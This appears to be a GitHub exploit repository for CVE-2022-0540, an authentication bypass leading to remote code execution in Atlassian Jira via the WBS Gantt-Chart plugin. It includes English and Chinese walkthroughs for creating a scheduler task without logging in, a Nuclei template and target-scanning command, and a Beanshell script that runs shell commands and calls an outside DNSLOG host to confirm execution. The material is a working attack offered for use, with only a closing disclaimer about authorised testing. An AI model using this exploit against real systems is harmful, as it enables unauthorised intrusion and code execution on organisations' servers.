├── README.md ├── README_CN.md ├── exploit.yaml └── images ├── image-20220525173951955.png ├── image-20220525190523282.png ├── image-20220525190607569.png ├── image-20220525190640472.png ├── image-20220525190657966.png ├── image-20220525190713512.png ├── image-20220525190728145.png ├── image-20220525190740547.png ├── image-20220525190756503.png └── image-20220525190830668.png /README.md: -------------------------------------------------------------------------------- 1 | # Atlassian Jira Seraph Authentication Bypass RCE（CVE-2022-0540） 2 | 3 | 4 | 5 |

6 | English • 7 | 中文 8 |

9 | 10 | 11 | ## Exploit Details 12 | 13 | As seen in author's [blog](https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/), atlassian provided a long list of affected plugins (the vast majority of which were false positives), and the author listed several actual affected plugins 14 | 15 | ![image-20220525190523282](images/image-20220525190523282.png) 16 | 17 | According to the prompted conditions, combined with the Official documentation for [WBS Gantt-Chart for Jira](https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate) 18 | 19 | ![image-20220525190607569](images/image-20220525190607569.png) 20 | 21 | Essentially, it is a RCE using the Beanshell Script of the job scheduler module Task, the exploit details are as follows. 22 | 23 | 1. For manual operation it's better to use the BurpSuite's replacement function `Proxy > Options > Match and Replace`, edit rule. 24 | 25 | ![image-20220525190640472](images/image-20220525190640472.png) 26 | 27 | 2. Use burp as a proxy to access the vulnerable Jira software，open `http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa;` then you can check `job scheduler configuration` 28 | 29 | ![image-20220525190657966](images/image-20220525190657966.png) 30 | 31 | Since our final Beanshell Script is executed as a timed task, you can modify the execution interval for your convenience by clicking Edit and modifying it according to the Cron format. 32 | 33 | 3. create Task 34 | 35 | ![image-20220525190713512](images/image-20220525190713512.png) 36 | 37 | 4. config Task 38 | 39 | ![image-20220525190728145](images/image-20220525190728145.png) 40 | 41 | After the configuration is complete, click Update but jump to the login page, do not worry, the Task has actually been added in the background. 42 | 43 | 5. Enable Task 44 | 45 | ![image-20220525190740547](images/image-20220525190740547.png) 46 | 47 | The newly created Task is Disable by default, you need to change it to Enable manually and then wait for a few seconds for Script to execute. 48 | 49 | 6. DNSLOG record 50 | 51 | ![image-20220525190756503](images/image-20220525190756503.png) 52 | 53 | at the same time, you can find the prompt that execution completion in job scheduler. 54 | 55 | ![image-20220525190830668](images/image-20220525190830668.png) 56 | 57 |
58 | 59 | Preconditions 60 | 61 | ``` 62 | WBS Gantt-Chart for Jira <= 9.14.3.1 63 | ``` 64 | 65 | 66 | 67 | ## Verify Exploitable 68 | 69 | ```yaml 70 | id: CVE-2022-0540 71 | 72 | info: 73 | name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540) 74 | author: DhiyaneshDK 75 | severity: critical 76 | description: | 77 | Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. 78 | reference: 79 | - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ 80 | - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 81 | - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 82 | classification: 83 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 84 | cvss-score: 9.8 85 | cve-id: CVE-2022-0540 86 | cwe-id: CWE-287 87 | metadata: 88 | shodan-query: http.component:"Atlassian Jira" 89 | tags: cve,cve2022,atlassian,jira,exposure,auth-bypass 90 | 91 | requests: 92 | - method: GET 93 | path: 94 | - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;' 95 | 96 | matchers-condition: and 97 | matchers: 98 | - type: word 99 | part: body 100 | words: 101 | - 'WBS Gantt-Chart' 102 | 103 | - type: regex 104 | regex: 105 | - '([.|\D]*?)' 106 | dsl: [] 107 | 108 | - type: status 109 | status: 110 | - 200 111 | 112 | ``` 113 | 114 | Run-Demo 115 | 116 | ``` 117 | nuclei -l targets.txt -t exploit.yaml 118 | ``` 119 | 120 | Screenshot 121 | 122 | ![image-20220525173951955](images/image-20220525173951955.png) 123 | 124 | 125 | 126 | ## Referer 127 | 128 | https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ 129 | 130 | https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate 131 | 132 | Beanshell Script 133 | 134 | ```java 135 | import java.io.IOException; 136 | import java.lang.*; 137 | 138 | Runtime runtime = Runtime.getRuntime(); 139 | 140 | try { 141 | 142 | String command = "ping -nc 1 55d2721a.dns.1433.eu.org"; 143 | 144 | if (System.getProperty("os.name").toLowerCase().contains("windows")) { 145 | runtime.exec(new String[]{"cmd.exe", "/c", command}); 146 | } else { 147 | runtime.exec(new String[]{"/bin/bash", "-c", command}); 148 | } 149 | 150 | } catch (IOException e) { 151 | e.printStackTrace(); 152 | } 153 | 154 | ``` 155 | 156 | 157 | 158 | ***The information mentioned in this article is intended for legitimate, authorized penetration testing, internal company security checks and research use only. The user is responsible for any adverse consequences arising from the use of the information provided in this article.*** 159 | -------------------------------------------------------------------------------- /README_CN.md: -------------------------------------------------------------------------------- 1 | # Atlassian Jira Seraph 认证绕过远程代码执行漏洞（CVE-2022-0540） 2 | 3 | 4 | 5 | ## 利用细节 6 | 7 | 根据漏洞作者文章的描述，atlassian 官方发布了一个很长的受影响的插件的列表（绝大部分是误报），而作者给出了几个实际受影响的插件名称 8 | 9 | ![image-20220525190523282](images/image-20220525190523282.png) 10 | 11 | 根据提示的利用条件，结合 WBS Gantt-Chart for Jira 插件的 [官方文档](https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate) 12 | 13 | ![image-20220525190607569](images/image-20220525190607569.png) 14 | 15 | 本质上就是利用 job scheduler 模块 Task 的 Beanshell Script 实现 RCE，利用过程如下 16 | 17 | 1. （为方便操作）使用 Burp 代理的替换功能 `Proxy > Options > Match and Replace` 新建规则 18 | 19 | ![image-20220525190640472](images/image-20220525190640472.png) 20 | 21 | 2. 开启 Burp 代理访问目标 Jira ，访问 `http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa;` 绕过认证查看 `job scheduler configuration` 22 | 23 | ![image-20220525190657966](images/image-20220525190657966.png) 24 | 25 | 由于我们最终执行的 Beanshell Script 是作为定时任务执行，为方便可以修改一下执行的间隔，点击 Edit 参照 Cron 格式修改即可 26 | 27 | 3. 新建 Task 28 | 29 | ![image-20220525190713512](images/image-20220525190713512.png) 30 | 31 | 4. 配置 Task 32 | 33 | ![image-20220525190728145](images/image-20220525190728145.png) 34 | 35 | 配置完成后点击 Update 自动跳转到 login page，但后台Task实际已经添加上了 36 | 37 | 5. 使能 Task 38 | 39 | ![image-20220525190740547](images/image-20220525190740547.png) 40 | 41 | 新创建的 Task 默认都是 Disable 状态，需要手动将其修改为 Enable 状态，然后等待几秒 Script 执行 42 | 43 | 6. 得到 DNSLOG 记录 44 | 45 | ![image-20220525190756503](images/image-20220525190756503.png) 46 | 47 | 同时 job scheduler 中可以看到命令执行完成的提示 48 | 49 | ![image-20220525190830668](images/image-20220525190830668.png) 50 | 51 |
52 | 53 | 利用前提 54 | 55 | ``` 56 | WBS Gantt-Chart for Jira <= 9.14.3.1 57 | ``` 58 | 59 | 60 | 61 | ## 验证可利用 62 | 63 | ```yaml 64 | id: CVE-2022-0540 65 | 66 | info: 67 | name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540) 68 | author: DhiyaneshDK 69 | severity: critical 70 | description: | 71 | Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. 72 | reference: 73 | - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ 74 | - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 75 | - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 76 | classification: 77 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 78 | cvss-score: 9.8 79 | cve-id: CVE-2022-0540 80 | cwe-id: CWE-287 81 | metadata: 82 | shodan-query: http.component:"Atlassian Jira" 83 | tags: cve,cve2022,atlassian,jira,exposure,auth-bypass 84 | 85 | requests: 86 | - method: GET 87 | path: 88 | - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;' 89 | 90 | matchers-condition: and 91 | matchers: 92 | - type: word 93 | part: body 94 | words: 95 | - 'WBS Gantt-Chart' 96 | 97 | - type: regex 98 | regex: 99 | - '([.|\D]*?)' 100 | dsl: [] 101 | 102 | - type: status 103 | status: 104 | - 200 105 | 106 | ``` 107 | 108 | 运行示例 109 | 110 | ``` 111 | nuclei -l targets.txt -t exploit.yaml 112 | ``` 113 | 114 | 运行截图 115 | 116 | ![image-20220525173951955](images/image-20220525173951955.png) 117 | 118 | 119 | 120 | ## 参考链接 121 | 122 | https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ 123 | 124 | https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate 125 | 126 | Beanshell Script 127 | 128 | ```java 129 | import java.io.IOException; 130 | import java.lang.*; 131 | 132 | Runtime runtime = Runtime.getRuntime(); 133 | 134 | try { 135 | String command = "ping -nc 1 55d2721a.dns.1433.eu.org"; 136 | 137 | if (System.getProperty("os.name").toLowerCase().contains("windows")) { 138 | runtime.exec(new String[]{"cmd.exe", "/c", command}); 139 | } else { 140 | runtime.exec(new String[]{"/bin/bash", "-c", command}); 141 | } 142 | 143 | } catch (IOException e) { 144 | e.printStackTrace(); 145 | } 146 | 147 | ``` 148 | 149 | 150 | 151 | ***声明：该文章中提到的信息仅用于合法的，经过授权的渗透测试，公司内部安全检查与研究使用。由于使用本文章提供的信息带来的不良后果由使用者本人负责。*** 152 | -------------------------------------------------------------------------------- /exploit.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2022-0540 2 | 3 | info: 4 | name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540) 5 | author: DhiyaneshDK 6 | severity: critical 7 | description: | 8 | Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. 9 | reference: 10 | - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ 11 | - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 12 | - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 13 | classification: 14 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 15 | cvss-score: 9.8 16 | cve-id: CVE-2022-0540 17 | cwe-id: CWE-287 18 | metadata: 19 | shodan-query: http.component:"Atlassian Jira" 20 | tags: cve,cve2022,atlassian,jira,exposure,auth-bypass 21 | 22 | requests: 23 | - method: GET 24 | path: 25 | - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;' 26 | 27 | matchers-condition: and 28 | matchers: 29 | - type: word 30 | part: body 31 | words: 32 | - 'WBS Gantt-Chart' 33 | 34 | - type: regex 35 | regex: 36 | - '([.|\D]*?)' 37 | dsl: [] 38 | 39 | - type: status 40 | status: 41 | - 200 42 | -------------------------------------------------------------------------------- /images/image-20220525173951955.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525173951955.png -------------------------------------------------------------------------------- /images/image-20220525190523282.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190523282.png -------------------------------------------------------------------------------- /images/image-20220525190607569.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190607569.png -------------------------------------------------------------------------------- /images/image-20220525190640472.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190640472.png -------------------------------------------------------------------------------- /images/image-20220525190657966.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190657966.png -------------------------------------------------------------------------------- /images/image-20220525190713512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190713512.png -------------------------------------------------------------------------------- /images/image-20220525190728145.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190728145.png -------------------------------------------------------------------------------- /images/image-20220525190740547.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190740547.png -------------------------------------------------------------------------------- /images/image-20220525190756503.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190756503.png -------------------------------------------------------------------------------- /images/image-20220525190830668.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190830668.png --------------------------------------------------------------------------------